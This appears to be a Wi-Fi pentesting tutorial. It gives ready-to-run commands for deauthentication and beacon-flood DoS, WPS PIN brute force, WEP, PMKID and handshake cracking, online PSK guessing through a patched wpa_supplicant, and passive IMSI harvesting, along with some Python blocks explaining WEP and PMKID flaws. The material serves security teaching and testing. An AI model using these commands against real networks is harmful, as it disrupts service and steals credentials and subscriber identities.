Pentesting Wifi

Basic Wifi commands

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Tools

Hijacker & NexMon (Android internal Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Run airgeddon with docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

It can perform Evil Twin, KARMA and Known Beacons attacks and then use a phishing template to obtain the real network password or capture social-network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It will automatically:

  • Put the interface in monitor mode
  • Scan for possible networks and let you choose the victim(s)
  • If WEP: launch WEP attacks
  • If WPA-PSK:
  • If WPS: Pixie Dust attack and brute-force attack (be careful, the brute-force attack can take a long time). Note that it does not try the null PIN or database/generated PINs.
  • Try to capture the PMKID from the AP in order to crack it
  • Try to deauthenticate clients of the AP in order to capture a handshake
  • If a PMKID or handshake is captured, try to brute-force it using the top 5000 passwords.

Attacks Summary

  • DoS
  • Deauthentication/disassociation – Disconnect everyone (or a specific ESSID/client)
  • Random fake APs – Hide networks, may crash scanners
  • Overload AP – Try to bring the AP down (usually not very useful)
  • WIDS – Play with the IDS
  • TKIP, EAPOL – Some specific attacks to DoS some APs
  • Cracking
  • Crack WEP (several tools and methods)
  • WPA-PSK
  • WPS pin “Brute-Force”
  • WPA PMKID bruteforce
  • [DoS +] WPA handshake capture + Cracking
  • WPA-MGT
  • Username capture
  • Bruteforce Credentials
  • Evil Twin (with or without DoS)
  • Open Evil Twin [+ DoS] – Useful to capture captive portal creds and/or perform LAN attacks
  • WPA-PSK Evil Twin – Useful for network attacks if you know the password
  • WPA-MGT – Useful to capture company credentials
  • KARMA, MANA, Loud MANA, Known beacon
  • + Open – Useful to capture captive portal creds and/or perform LAN attacks
  • + WPA – Useful to capture WPA handshakes

Open / OWE networks quick notes

  • Passive capture on open SSIDs still works with monitor mode and tcpdump:
iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap
  • OWE (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so frames on the air are encrypted even on “open” SSIDs. Because it is built on WPA3, it also enforces 802.11w PMF, which blocks spoofed deauth/disassoc frames.
  • OWE does not authenticate joiners: anyone can associate, so verify client isolation instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works.
  • Evil Twin is still possible on open/OWE SSIDs by presenting a stronger signal; PMF only removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is available again.
  • Broadcast poisoning on open guest Wi-Fi readily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Description from here:

Deauthentication attacks, a widely used method in Wi-Fi hacking, involve forging “management” frames to forcefully disconnect devices from a network. These unencrypted packets trick clients into believing they come from the legitimate network, enabling attackers to collect WPA handshakes for cracking or to persistently disrupt network connections. This tactic, alarming in its simplicity, is widely used and has significant implications for network security.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 means deauthentication
  • the number after -0 is how many deauths to send (you can send as many as you want); 0 means send them continuously
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then a broadcast deauthentication is sent (not always successful)
  • ath0 is the interface name

Disassociation Packets

Disassociation packets, similar to deauthentication packets, are a type of management frame used in Wi-Fi networks. These packets serve to sever the connection between a device (such as a laptop or smartphone) and an access point (AP). The main distinction between disassociation and deauthentication lies in their usage scenarios. While an AP sends deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, restart, or relocating, thereby necessitating the disconnection of all connected nodes.

This attack can be performed with mdk4 (mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -E WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters are optional; you could give only the ESSID and mdk4 will automatically search for it, wait to find clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

More DOS attacks with mdk4

From here.

ATTACK MODE b: Beacon Flooding

Sends beacon frames to show fake APs to clients. This can sometimes crash network scanners and even drivers!

# -a Use also non-printable characters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Sending authentication frames to all accessible Access Points (APs) within range can overload these APs, especially when many clients are involved. This heavy traffic can lead to system instability, causing some APs to freeze or even reset.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat packets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) checks whether an SSID is properly revealed and confirms the AP's range. This technique, combined with bruteforcing hidden SSIDs with or without a wordlist, helps identify and access concealed networks.

ATTACK MODE m: Michael Countermeasures Exploitation

Sending random or duplicate packets to different QoS queues can trigger Michael Countermeasures on TKIP APs, leading to a one-minute AP shutdown. This method is an efficient DoS (Denial of Service) attack tactic.

# -t <BSSID> of a TKIP AP
# -j use intelligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Flooding an AP with EAPOL Start frames creates fake sessions, overwhelming the AP and blocking legitimate clients. Alternatively, injecting fake EAPOL Logoff messages forcibly disconnects clients; both methods effectively disrupt network service.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks

Various attacks on link management and routing in mesh networks.

ATTACK MODE w: WIDS Confusion

Cross-connecting clients to multiple WDS nodes or fake rogue APs can manipulate Intrusion Detection and Prevention Systems, creating confusion and potential system abuse.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mdk4 wlan0mon w -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer featuring diverse packet sources and a comprehensive set of modifiers for packet manipulation.

Airgeddon

Airgeddon offers most of the attacks proposed in the previous comments:

WPS

WPS (Wi-Fi Protected Setup) simplifies the process of connecting devices to a router, enhancing the setup speed and ease for networks encrypted with WPA or WPA2 Personal. It is ineffective for the easily compromised WEP security. WPS employs an 8-digit PIN, validated in two halves, making it susceptible to brute-force attacks due to its limited number of combinations (11,000 possibilities).
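The checksum rule and the two-half validation described above, worked through in Python. This is an added example, not code from the page or from Reaver/Bully: the last PIN digit is a checksum over the first seven (the weighting below is the one in the WPS specification), and because the AP answers the registrar's M4 message with a NACK when the first four digits are wrong and M6 with a NACK when the last four are wrong, an attacker searches the halves independently. The sample PINs are the well-known default 12345670 and constructed values.

```python
def wps_checksum(first7: str) -> int:
    """Checksum digit from the WPS spec: weights 3,1,3,1,3,1,3 over the first seven digits."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("need exactly 7 decimal digits")
    acc = sum((3 if i % 2 == 0 else 1) * int(ch) for i, ch in enumerate(first7))
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if the 8-digit PIN carries a correct checksum in its last digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def valid_pins_total() -> int:
    """Eight-digit PINs that pass the checksum: every 7-digit prefix has exactly one."""
    return 10**7


def worst_case_attempts() -> int:
    """Attempts needed when each half is confirmed separately: 10^4 for the first
    four digits, then 10^3 for the second half (3 free digits, the checksum is
    derived), instead of the 10^7 checksum-valid PINs."""
    return 10**4 + 10**3


def valid_second_halves(first4: str) -> int:
    """Count the second halves that pass the checksum for a fixed first half (expect 1000)."""
    return sum(1 for p in range(10**4) if is_valid_wps_pin(f"{first4}{p:04d}"))


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))   # widely seen default PIN
    print("valid PINs:", valid_pins_total(), "worst case with split check:", worst_case_attempts())
    print("valid second halves for prefix 1234:", valid_second_halves("1234"))
```

The gap between `valid_pins_total()` and `worst_case_attempts()` is the whole reason WPS external-registrar PIN authentication is considered broken; rate limiting or disabling the PIN method is the fix, since the checksum and the split check are protocol design, not implementation bugs.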

WPS Bruteforce

There are 2 main tools to perform this action: Reaver and Bully.

  • Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
  • Bully is a new implementation of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options.

The attack exploits the WPS PIN's vulnerability, particularly its exposure of the first four digits and the last digit's role as a checksum, easing the brute-force attack. However, defenses against brute-force attacks, like blocking MAC addresses of aggressive attackers, demand MAC address rotation to continue the attack.

Upon obtaining the WPS PIN with tools like Bully or Reaver, the attacker can deduce the WPA/WPA2 PSK, ensuring persistent network access.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N [-L -d 2] -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

This refined approach targets WPS PINs using known vulnerabilities:

  1. Pre-discovered PINs: Use a database of known PINs linked to specific manufacturers known for using uniform WPS PINs. This database correlates the first three octets of MAC addresses with likely PINs for these manufacturers.
  2. PIN generation algorithms: Use algorithms like ComputePIN and EasyBox, which compute WPS PINs based on the AP's MAC address. The Arcadyan algorithm additionally requires a device ID, adding a layer to the PIN generation process.

WPS Pixie Dust attack

Dominique Bongard discovered a flaw in some Access Points (APs) concerning the creation of secret codes, known as nonces (E-S1 and E-S2). If these nonces can be figured out, cracking the AP's WPS PIN becomes easy. The AP reveals the PIN within a special code (hash) to prove it is legitimate and not a fake (rogue) AP. These nonces are essentially the “keys” to unlocking the “safe” that holds the WPS PIN. See more here.

In simple terms, the issue is that some APs did not use sufficiently random keys for encrypting the PIN during the connection process. This makes the PIN vulnerable to being guessed from outside the network (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

If you do not want to switch the device to monitor mode, or reaver and bully have some problems, you can try OneShot-C. This tool can perform the Pixie Dust attack without having to switch to monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Some poorly designed systems even let a Null PIN (an empty or nonexistent PIN) grant access, which is quite unusual. The tool Reaver is capable of testing for this vulnerability, unlike Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All the proposed WPS attacks can be easily performed using airgeddon.

  • 5 and 6 let you try your custom PIN (if you have any)
  • 7 and 8 perform the Pixie Dust attack
  • 13 lets you test the NULL PIN
  • 11 and 12 will collect the PINs related to the selected AP from the available databases and generate possible PINs using: ComputePIN, EasyBox and optionally Arcadyan (recommended, why not?)
  • 9 and 10 will test every possible PIN

WEP

Why it breaks

  • The RC4 seed is just IV (24 bits) + shared key. The IV is cleartext, small (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream.
  • XORing two ciphertexts with the same keystream leaks PlaintextA ⊕ PlaintextB; predictable headers + RC4 KSA biases (FMS) let you “vote” on key bytes. PTW improves this by using ARP traffic to reduce the requirement to hundreds of thousands of packets instead of millions.
  • Integrity is just CRC32 (linear/unkeyed), so an attacker can flip bits and recompute the CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.
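The first and third properties above, demonstrated end to end with a toy WEP implementation in Python. This is an added example, not code from the page or from the aircrack-ng suite; the 40-bit key, the IV and the frame contents are constructed values. It shows that two frames sent under the same IV leak the XOR of their plaintexts to anyone holding only the ciphertexts, and that the CRC32 ICV can be repaired after a bit flip without the key because CRC32 is linear: crc(P ⊕ D) = crc(P) ⊕ crc(D) ⊕ crc(0…0).

```python
import struct
import zlib


def rc4_keystream(seed: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || shared key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC32, little-endian, unkeyed."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as WEP sends it: cleartext 3-byte IV || RC4(IV||key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok) as a receiver that knows the key would."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt, tag = body[:-4], body[-4:]
    return pt, tag == icv(pt)


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream: C_A XOR C_B == P_A XOR P_B, no key needed."""
    if frame_a[:3] != frame_b[:3] or len(frame_a) != len(frame_b):
        raise ValueError("need two equal-length frames encrypted under the same IV")
    pt_len = len(frame_a) - 3 - 4  # strip IV and ICV
    return xor(frame_a[3:3 + pt_len], frame_b[3:3 + pt_len])


def forge_without_key(frame: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the hidden plaintext and repair the ICV using CRC32 linearity:
    crc(P XOR D) == crc(P) XOR crc(D) XOR crc(zeros). The key is never needed."""
    iv, ct = frame[:3], frame[3:]
    if len(delta) != len(ct) - 4:
        raise ValueError("delta must cover the whole plaintext")
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(ct, delta + icv_delta)


# Constructed sample values (not real traffic): a 40-bit key and one IV reused for two frames.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"
PT_A = b"GET /index.html "
PT_B = b"GET /login.html "

if __name__ == "__main__":
    fa, fb = wep_encrypt(KEY, IV, PT_A), wep_encrypt(KEY, IV, PT_B)
    print("P_A xor P_B recovered from ciphertexts alone:", keystream_reuse_leak(fa, fb).hex())
    forged = forge_without_key(fa, xor(PT_A, b"GET /admin.html "))
    print("forged frame decrypts to:", wep_decrypt(KEY, forged))
```

Both functions operate on nothing but captured bytes, which is the point: neither a keystream-reuse leak nor an ICV fix-up is detectable by the receiver, so the only defence is not running WEP at all.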

Practical breakage is deterministic:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon still offers an “All-in-One” WEP workflow if you prefer a guided UI.



WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs a single packet and does not require any clients to be connected to the target AP: only the attacker and the AP interact.

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes the PMKID.

As the original post explains, the PMKID is created using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Given that the “PMK Name” is constant, we know the BSSID of the AP and of the station, and the PMK is identical to the one from a full 4-way handshake, hashcat can use this information to crack the PSK and recover the passphrase!

To gather this information and bruteforce the password locally you can do:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtain PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

The captured PMKIDs will be shown in the console and also saved inside /tmp/attack.pcap
Now, convert the capture to hashcat/john format and crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Please note that the format of a correct hash contains 4 parts, like: 4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838 (PMKID*MAC_AP*MAC_STA*ESSID in hex). If yours only contains 3 parts, then it is invalid (the PMKID capture was not valid).
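The PMKID formula above and the four-part hash format, worked through in Python. This is an added example, not code from the page or from hashcat/hcxtools: it derives the PMK from a passphrase with PBKDF2-HMAC-SHA1 (the WPA/WPA2-PSK derivation; WPA3-SAE differs), computes PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA), and checks a 16800-format record against a known passphrase. That check is how you confirm a capture of your own AP is usable before trusting it, since, as noted below, some captured material does not crack even with the right password. The ESSID, MACs and passphrase are constructed values, not a real capture.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): first 16 bytes of HMAC-SHA1."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> dict:
    """hashcat -m 16800 record: PMKID*MAC_AP*MAC_STA*ESSID_hex, four '*'-separated parts."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError(f"expected 4 parts, got {len(parts)}: the PMKID capture is invalid")
    p, ap, sta, essid = parts
    if len(p) != 32 or len(ap) != 12 or len(sta) != 12:
        raise ValueError("PMKID must be 32 hex chars and each MAC 12 hex chars")
    return {"pmkid": bytes.fromhex(p), "mac_ap": bytes.fromhex(ap),
            "mac_sta": bytes.fromhex(sta), "essid": bytes.fromhex(essid)}


def is_valid_record(line: str) -> bool:
    """Structural check only: does the line have the shape a valid capture produces?"""
    try:
        parse_16800(line)
        return True
    except ValueError:
        return False


def make_16800_line(passphrase: str, essid: bytes, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build the record an AP with this passphrase yields, in the 16800 layout hcxpcaptool -z emits."""
    p = pmkid(pmk_from_passphrase(passphrase, essid), mac_ap, mac_sta)
    return "*".join([p.hex(), mac_ap.hex(), mac_sta.hex(), essid.hex()])


def passphrase_matches(line: str, passphrase: str) -> bool:
    """True if the candidate passphrase reproduces the PMKID in the record."""
    rec = parse_16800(line)
    pmk = pmk_from_passphrase(passphrase, rec["essid"])
    return hmac.compare_digest(pmkid(pmk, rec["mac_ap"], rec["mac_sta"]), rec["pmkid"])


# Constructed sample: a lab AP whose passphrase we know. MACs and ESSID are made up.
LAB_ESSID = b"LabNet"
LAB_AP = bytes.fromhex("02aabbccdd01")
LAB_STA = bytes.fromhex("02aabbccdd02")
LAB_LINE = make_16800_line("correct horse battery", LAB_ESSID, LAB_AP, LAB_STA)

if __name__ == "__main__":
    print(LAB_LINE)
    print("known passphrase reproduces PMKID:", passphrase_matches(LAB_LINE, "correct horse battery"))
    print("3-part line accepted:", is_valid_record("aa*bb*cc"))
```

The 4096-iteration PBKDF2 is the only cost in the whole check, which is why PMKID cracking speed is bounded by passphrase entropy alone; anything in a wordlist falls quickly, and the mitigation is a long random PSK or moving to WPA3-SAE.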

Note that hcxdumptool also captures handshakes (something like this will appear: MP:M1M2 RC:63258 EAPOLTIME:17091). You can convert the handshakes to hashcat/john format using cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

I have noticed that some handshakes captured with this tool could not be cracked even knowing the correct password. I would recommend capturing handshakes also via the traditional way if possible, or capturing several of them using this tool.

Capturing a handshake

An attack on WPA/WPA2 networks can be executed by capturing a handshake and attempting to crack the password offline. This process involves monitoring the communication of a specific network and BSSID on a particular channel. Here is a streamlined guide:

  1. Identify the BSSID, channel, and a connected client of the target network.
  2. Use airodump-ng to monitor the network traffic on the specified channel and BSSID, hoping to capture a handshake. The command will look like this:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  3. To increase the chance of capturing a handshake, momentarily disconnect the client from the network to force a re-authentication. This can be done using the aireplay-ng command, which sends deauthentication packets to the client:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that since the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

Once handshake information appears in airodump-ng, this means the handshake was captured and you can stop listening:

Once the handshake is captured you can crack it with aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Check if the handshake is in the file

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was captured

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

If this tool finds an uncompleted handshake of an ESSID before the completed one, it will not detect the valid one.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Faster online PSK guessing via the wpa_supplicant ctrl socket (no clients/PMKID)

When there are no clients around and the AP refuses PMKID, you can cycle through PSKs online without respawning supplicants:

  • Patch wpa_supplicant.c to force dur = 0; in the auth failure backoff logic (near ssid->auth_failures), effectively disabling the temporary-disable timer.
  • Run a single daemon with a control socket:
# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
  • Drive it via the control interface, reusing the same scan and network:
ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

A small Python loop reading the socket events (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) can try ~100 guesses in about 5 minutes without scan overhead. It is still noisy and can be detected, but it avoids restarting the process for each attempt and the backoff delays.

WPA Enterprise (MGT)

In enterprise WiFi setups, you will encounter various authentication methods, each providing different security levels and management features. When you use tools like airodump-ng to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):
  • This method supports hardware tokens and one-time passwords within EAP-PEAP. Unlike MSCHAPv2, it does not use a peer challenge and sends passwords in plaintext to the access point, posing a risk for downgrade attacks.
  2. EAP-MD5 (Message Digest 5):
  • Involves sending the MD5 hash of the password from the client. It is not recommended because it is vulnerable to dictionary attacks, lacks server authentication, and cannot generate session-specific WEP keys.
  3. EAP-TLS (Transport Layer Security):
  • Uses both client-side and server-side certificates for authentication and can dynamically generate user-based and session-based WEP keys to secure communications.
  4. EAP-TTLS (Tunneled Transport Layer Security):
  • Provides mutual authentication through an encrypted tunnel, along with a method to derive dynamic, per-user, per-session WEP keys. It requires only server-side certificates, with clients using credentials.
  5. PEAP (Protected Extensible Authentication Protocol):
  • Functions similarly to EAP by creating a TLS tunnel for protected communication. It allows the use of weaker authentication protocols on top of EAP due to the protection offered by the tunnel.
  • PEAP-MSCHAPv2: Often referred to as PEAP, it combines the vulnerable MSCHAPv2 challenge/response mechanism with a protective TLS tunnel.
  • PEAP-EAP-TLS (or PEAP-TLS): Similar to EAP-TLS but initiates a TLS tunnel before exchanging certificates, offering an additional layer of security.

You can find more information about these authentication methods here and here.

Username capture

Reading https://tools.ietf.org/html/rfc3748#page-27 it looks like if you are using EAP the “Identity” messages must be supported, and the username is going to be sent in the clear in the “Response Identity” messages.

Even using one of the most secure authentication methods, PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do so, capture an authentication exchange (start airodump-ng on the channel and wireshark on the same interface) and filter the packets by eapol.
Inside the “Response, Identity” packet, the username of the client will appear.

Anonymous Identities

Identity hiding is supported by both EAP-PEAP and EAP-TTLS. In the context of a WiFi network, an EAP-Identity request is typically initiated by the access point (AP) during the association process. To ensure the protection of user anonymity, the response from the EAP client on the user's device contains only the essential information required for the initial RADIUS server to process the request. This concept is illustrated through the following scenarios:

  • EAP-Identity = anonymous
  • In this scenario, all users employ the pseudonym “anonymous” as their user identifier. The initial RADIUS server functions as either an EAP-PEAP or EAP-TTLS server, responsible for managing the server side of the PEAP or TTLS protocol. The inner (protected) authentication method is then either handled locally or delegated to a remote (home) RADIUS server.
  • EAP-Identity = anonymous@realm_x
  • In this situation, users from different realms conceal their identities while indicating their respective realms. This allows the initial RADIUS server to proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms, which act as the PEAP or TTLS server. The initial RADIUS server operates solely as a RADIUS relay node.
  • Alternatively, the initial RADIUS server may function as the EAP-PEAP or EAP-TTLS server and either handle the protected authentication method or forward it to another server. This option facilitates the configuration of distinct policies for various realms.

In EAP-PEAP, once the TLS tunnel is established between the PEAP server and the PEAP client, the PEAP server initiates an EAP-Identity request and transmits it through the TLS tunnel. The client responds to this second EAP-Identity request by sending an EAP-Identity response containing the user's true identity through the encrypted tunnel. This approach effectively prevents the revelation of the user's actual identity to anyone eavesdropping on the 802.11 traffic.

EAP-TTLS follows a slightly different procedure. With EAP-TTLS, the client typically authenticates using PAP or CHAP, secured by the TLS tunnel. In this case, the client includes a User-Name attribute and either a Password or CHAP-Password attribute in the initial TLS message sent after tunnel establishment.

Regardless of the protocol chosen, the PEAP/TTLS server obtains the user's true identity after the TLS tunnel is established. The true identity can be represented as user@realm or simply user. If the PEAP/TTLS server is also responsible for authenticating the user, it now possesses the user's identity and proceeds with the authentication method protected by the TLS tunnel. Alternatively, the PEAP/TTLS server may forward a new RADIUS request to the user's home RADIUS server. This new RADIUS request omits the PEAP or TTLS protocol layer. In cases where the protected authentication method is EAP, the inner EAP messages are transmitted to the home RADIUS server without the EAP-PEAP or EAP-TTLS wrapper. The User-Name attribute of the outgoing RADIUS message contains the user's true identity, replacing the anonymous User-Name from the incoming RADIUS request. When the protected authentication method is PAP or CHAP (supported only by TTLS), the User-Name and other authentication attributes extracted from the TLS payload are substituted into the outgoing RADIUS message, displacing the anonymous User-Name and TTLS EAP-Message attributes found in the incoming RADIUS request.

For more information check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment does not enforce pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

  • 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
  • Authenticator sends EAP-Request/Identity.
  • Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
  • Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
  • Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

# 1) Enable monitor mode
airmon-ng start wlan0
# 2) Optional: lock channel to the target BSS
airodump-ng wlan0mon --essid <SSID>
# 3) Capture 802.1X/EAP frames
# Wireshark display filters:
#   eap || eapol
#   (identity specifically): eap.code == 2 && eap.type == 1
# Kismet: add source wlan0mon; enable 802.1X/EAP views
# tcpdump (pcap capture):
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap
# 4) Wait for a device to auto-connect to the SSID
